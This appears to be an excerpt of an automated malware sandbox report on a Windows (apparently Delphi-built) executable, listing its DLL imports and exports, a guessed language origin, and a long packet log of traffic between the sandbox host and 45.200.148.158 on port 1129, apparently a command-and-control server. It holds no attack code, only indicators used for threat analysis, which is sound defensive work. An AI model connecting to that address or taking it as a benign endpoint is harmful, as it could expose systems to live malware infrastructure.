oleaut32.dll	SysFreeString, SysReAllocStringLen, SysAllocStringLen
advapi32.dll	RegQueryValueExW, RegOpenKeyExW, RegCloseKey
user32.dll	CharNextW, LoadStringW
kernel32.dll	Sleep, VirtualFree, VirtualAlloc, lstrlenW, VirtualQuery, QueryPerformanceCounter, GetTickCount, GetSystemInfo, GetVersion, CompareStringW, IsValidLocale, SetThreadLocale, GetSystemDefaultUILanguage, GetUserDefaultUILanguage, GetLocaleInfoW, WideCharToMultiByte, MultiByteToWideChar, GetACP, LoadLibraryExW, GetStartupInfoW, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetCommandLineW, FindResourceW, FreeLibrary, GetLastError, UnhandledExceptionFilter, RtlUnwindEx, RtlUnwind, RaiseException, ExitProcess, ExitThread, SwitchToThread, GetCurrentThreadId, CreateThread, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, FindFirstFileW, FindClose, WriteFile, GetStdHandle, CloseHandle
kernel32.dll	GetProcAddress, RaiseException, LoadLibraryA, GetLastError, TlsSetValue, TlsGetValue, LocalFree, LocalAlloc, GetModuleHandleW, FreeLibrary
user32.dll	WINNLSEnableIME, SetClassLongPtrW, GetClassLongPtrW, SetWindowLongPtrW, GetWindowLongPtrW, CreateWindowExW, WindowFromPoint, WaitMessage, UpdateLayeredWindow, UpdateWindow, UnregisterClassW, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, TrackMouseEvent, SystemParametersInfoW, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCaret, SetWindowRgn, SetWindowsHookExW, SetWindowTextW, SetWindowPos, SetWindowPlacement, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropW, SetParent, SetMenuItemInfoW, SetMenu, SetForegroundWindow, SetFocus, SetCursorPos, SetCursor, SetClipboardData, SetCapture, SetActiveWindow, SendMessageTimeoutW, SendMessageA, SendMessageW, ScrollWindow, ScreenToClient, RemovePropW, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageW, RegisterClipboardFormatW, RegisterClassW, RedrawWindow, PostQuitMessage, PostMessageW, PeekMessageA, PeekMessageW, OpenClipboard, MsgWaitForMultipleObjectsEx, MsgWaitForMultipleObjects, MessageBoxIndirectW, MessageBoxW, MessageBeep, MapWindowPoints, MapVirtualKeyW, LoadStringW, LoadKeyboardLayoutW, LoadIconW, LoadCursorW, LoadBitmapW, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsIconic, IsDialogMessageA, IsDialogMessageW, IsClipboardFormatAvailable, IsChild, InvalidateRect, InsertMenuItemW, InsertMenuW, InflateRect, HideCaret, GetWindowThreadProcessId, GetWindowTextLengthW, GetWindowTextW, GetWindowRect, GetWindowPlacement, GetWindowDC, GetUpdateRgn, GetUpdateRect, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetScrollBarInfo, GetPropW, GetParent, GetWindow, GetMessagePos, GetMessageExtraInfo, GetMenuStringW, GetMenuState, GetMenuItemInfoW, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameW, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextW, GetIconInfo, GetForegroundWindow, GetFocus, GetDlgCtrlID, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameW, GetClassInfoExW, GetClassInfoW, GetCapture, GetActiveWindow, FrameRect, FindWindowExW, FindWindowW, FillRect, EnumWindows, EnumThreadWindows, EnumClipboardFormats, EnumChildWindows, EndPaint, EndMenu, EnableWindow, EnableScrollBar, EnableMenuItem, EmptyClipboard, DrawTextExW, DrawTextW, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageA, DispatchMessageW, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcW, DefMDIChildProcW, DefFrameProcW, CreatePopupMenu, CreateMenu, CreateIcon, CreateAcceleratorTableW, CountClipboardFormats, CopyImage, CopyIcon, CloseClipboard, ClientToScreen, CheckMenuItem, CharUpperBuffW, CharUpperW, CharNextW, CharLowerBuffW, CharLowerW, CallWindowProcW, CallNextHookEx, BeginPaint, AppendMenuW, AdjustWindowRectEx, ActivateKeyboardLayout
gdi32.dll	UnrealizeObject, TextOutW, StretchDIBits, StretchBlt, StartPage, StartDocW, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetTextAlign, SetStretchBltMode, SetRectRgn, SetROP2, SetPixel, SetMetaRgn, SetMapMode, SetEnhMetaFileBits, SetDIBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SetAbortProc, SelectPalette, SelectObject, SaveDC, RoundRect, RestoreDC, ResizePalette, Rectangle, RectVisible, RealizePalette, Polyline, Polygon, PolyBezierTo, PolyBezier, PlayEnhMetaFile, Pie, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsW, GetTextExtentPointW, GetTextExtentPoint32W, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetRegionData, GetPixel, GetPaletteEntries, GetObjectA, GetObjectW, GetNearestPaletteIndex, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileDescriptionW, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetCurrentPositionEx, GetClipBox, GetCharABCWidthsFloatW, GetBrushOrgEx, GetBitmapBits, GdiFlush, FrameRgn, ExtTextOutW, ExtFloodFill, ExtCreateRegion, ExcludeClipRect, EnumFontsW, EnumFontFamiliesExW, EndPage, EndDoc, Ellipse, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreateRectRgn, CreatePenIndirect, CreatePalette, CreateICW, CreateHalftonePalette, CreateFontIndirectW, CreateFontW, CreateDIBitmap, CreateDIBSection, CreateDCW, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileW, CombineRgn, Chord, BitBlt, ArcTo, Arc, AngleArc, AbortDoc
version.dll	VerQueryValueW, GetFileVersionInfoSizeW, GetFileVersionInfoW
kernel32.dll	lstrlenW, WritePrivateProfileStringW, WriteFile, WideCharToMultiByte, WaitForSingleObject, WaitForMultipleObjectsEx, VirtualQueryEx, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, VerSetConditionMask, VerifyVersionInfoW, UnmapViewOfFile, TryEnterCriticalSection, SwitchToThread, SuspendThread, Sleep, SizeofResource, SetThreadPriority, SetThreadLocale, SetLastError, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResumeThread, ResetEvent, RemoveDirectoryW, ReadFile, RaiseException, QueryPerformanceFrequency, QueryPerformanceCounter, QueryDosDeviceW, IsDebuggerPresent, OutputDebugStringW, MulDiv, MapViewOfFile, LockResource, LocalFree, LoadResource, LoadLibraryW, LeaveCriticalSection, LCMapStringW, IsValidLocale, InitializeCriticalSection, HeapSize, HeapFree, HeapDestroy, HeapCreate, HeapAlloc, GlobalUnlock, GlobalSize, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomW, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomW, GetVolumeInformationW, GetVersionExW, GetVersion, GetUserDefaultLCID, GetTimeZoneInformation, GetTickCount, GetThreadPriority, GetThreadLocale, GetTempPathW, GetTempFileNameW, GetSystemDirectoryW, GetStdHandle, GetLongPathNameW, GetProcAddress, GetPrivateProfileStringW, GetModuleHandleW, GetModuleFileNameW, GetLogicalDriveStringsW, GetLocaleInfoW, GetLocalTime, GetLastError, GetFullPathNameW, GetFileSize, GetFileAttributesExW, GetFileAttributesW, GetExitCodeThread, GetDriveTypeW, GetDiskFreeSpaceW, GetDateFormatW, GetCurrentThreadId, GetCurrentThread, GetCurrentProcessId, GetCurrentProcess, GetComputerNameW, GetCPInfoExW, GetCPInfo, GetACP, FreeResource, FreeLibrary, FormatMessageW, FindResourceW, FindNextFileW, FindFirstFileW, FindClose, FileTimeToSystemTime, FileTimeToLocalFileTime, FileTimeToDosDateTime, ExpandEnvironmentStringsW, EnumSystemLocalesW, EnumResourceNamesW, EnumCalendarInfoW, EnterCriticalSection, DeleteFileW, DeleteCriticalSection, CreateThread, CreateFileMappingW, CreateFileW, CreateEventW, CreateDirectoryW, CopyFileW, CompareStringA, CompareStringW, CloseHandle
advapi32.dll	RegUnLoadKeyW, RegSetValueExW, RegSaveKeyW, RegRestoreKeyW, RegReplaceKeyW, RegQueryValueExW, RegQueryInfoKeyW, RegOpenKeyExW, RegLoadKeyW, RegFlushKey, RegEnumValueW, RegEnumKeyW, RegEnumKeyExW, RegDeleteValueW, RegDeleteKeyW, RegCreateKeyExW, RegConnectRegistryW, RegCloseKey
kernel32.dll	Sleep
oleaut32.dll	SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
oleaut32.dll	GetErrorInfo, SysFreeString
ole32.dll	CreateStreamOnHGlobal, ReleaseStgMedium, OleDraw, DoDragDrop, RevokeDragDrop, RegisterDragDrop, OleUninitialize, OleInitialize, CoTaskMemFree, CoTaskMemAlloc, CoCreateInstance, CoGetClassObject, CoUninitialize, CoInitialize, IsEqualGUID
comctl32.dll	InitializeFlatSB, FlatSB_SetScrollProp, FlatSB_SetScrollPos, FlatSB_SetScrollInfo, FlatSB_GetScrollPos, FlatSB_GetScrollInfo, _TrackMouseEvent, ImageList_GetImageInfo, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Copy, ImageList_LoadImageW, ImageList_GetIcon, ImageList_Remove, ImageList_DrawEx, ImageList_Replace, ImageList_Draw, ImageList_SetOverlayImage, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
user32.dll	EnumDisplayMonitors, GetMonitorInfoW, MonitorFromPoint, MonitorFromRect, MonitorFromWindow
msvcrt.dll	isxdigit, isupper, isspace, ispunct, isprint, islower, isgraph, isdigit, iscntrl, isalpha, isalnum, toupper, tolower, strchr, strncmp, memset, memcpy, memcmp
shell32.dll	ShellExecuteW, Shell_NotifyIconW, DragQueryFileW
shell32.dll	SHGetSpecialFolderPathW
comdlg32.dll	PageSetupDlgW, PrintDlgW, GetSaveFileNameW, GetOpenFileNameW
winspool.drv	SetPrinterW, OpenPrinterW, GetPrinterW, GetDefaultPrinterW, EnumPrintersW, DocumentPropertiesW, DeviceCapabilitiesW, ClosePrinter
winspool.drv	GetDefaultPrinterW
winmm.dll	timeGetTime
d3d9.dll	Direct3DCreate9

Exports

Name	Ordinal	Address
TMethodImplementationIntercept	3	0x4a3640
__dbk_fcall_wrapper	2	0x418200
dbkFCallWrapperAddr	1	0xe75f58

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States
Dutch	Belgium
Chinese	China

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 20:26:01.272341013 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:01.277287960 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:01.277364016 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:01.277798891 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:01.282588005 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:01.911989927 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:01.963201046 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:03.935849905 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:03.941000938 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:03.941056013 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:03.946365118 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:04.230266094 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:04.275582075 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:04.351068974 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:04.353005886 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:04.357804060 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:04.357877970 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:04.362706900 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:04.648734093 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:04.697458029 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:04.782149076 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:04.782331944 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:04.787856102 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:04.787921906 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:04.793550968 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:04.793607950 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:04.798655033 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:04.903640985 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:04.909760952 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:04.909843922 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:04.915715933 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.278810024 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.279170036 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.279232025 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.279583931 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.279618979 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.279660940 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.281244993 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.281280994 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.281321049 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.282629013 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.282660007 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.282706022 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.284454107 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.284487009 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.284516096 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.284532070 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.286273956 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.286308050 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.286329031 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.338099957 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.356637001 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.357076883 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.357140064 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.369587898 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.370012999 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.370058060 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.370138884 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.371014118 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.371062994 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.374732971 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.374747992 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.374794960 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.375792980 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.375808001 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.375844002 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.379509926 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.379524946 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.379538059 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.379559994 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.380500078 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.380515099 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.380543947 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.384227991 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.384242058 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.384254932 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.384265900 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.384290934 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.385231018 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.385245085 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.385282993 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.388972998 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.388988018 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.389022112 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.389942884 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.389956951 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.389969110 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.389991045 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.431835890 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.460326910 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.460696936 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.460735083 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.461549997 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.461569071 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.461601973 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.465471029 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.465492010 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.465533972 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.466373920 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.466392994 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.466408968 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.466455936 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.470242977 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.470254898 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.470287085 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.471071005 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.471082926 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.471111059 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.474956036 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.474967003 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.475002050 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.475872993 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.475883961 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.475893974 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.475908041 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.475934029 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.479774952 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.479785919 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.479825020 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.480628014 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.480639935 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.480679989 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.484540939 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.484553099 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.484617949 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.485506058 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.485516071 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.485526085 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.485553026 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.489322901 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.489352942 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.489393950 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.490184069 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.490195990 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.490236998 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.491993904 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.492006063 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.492046118 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.493813038 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.493824959 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.493865013 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.495691061 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.495702028 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.495711088 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.495743990 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.495759964 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.497483969 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.497517109 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.497562885 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.499334097 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.499368906 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.499459028 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.502109051 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.502470970 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.502505064 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.502521992 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.550914049 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.550971031 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.551374912 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.551603079 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.551656008 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.552604914 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.552638054 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.552695036 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.554639101 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.554672003 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.554704905 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.554718971 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.556744099 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.556777000 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.556806087 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.558866978 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.558900118 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.558917046 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.560921907 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.560956955 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.561003923 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.562587976 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.562663078 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.562681913 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.564285994 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.564318895 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.564337015 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.564356089 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.564405918 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.565905094 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.565943003 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.565990925 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.567576885 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.567610025 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.567656040 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.569245100 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.569279909 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.569328070 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.570744038 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.570776939 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.570807934 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.570826054 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.572243929 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.572277069 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.572299957 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.573755980 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.573829889 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.573848009 CET	49730	1129	192.168.2.4	45.200.148.158
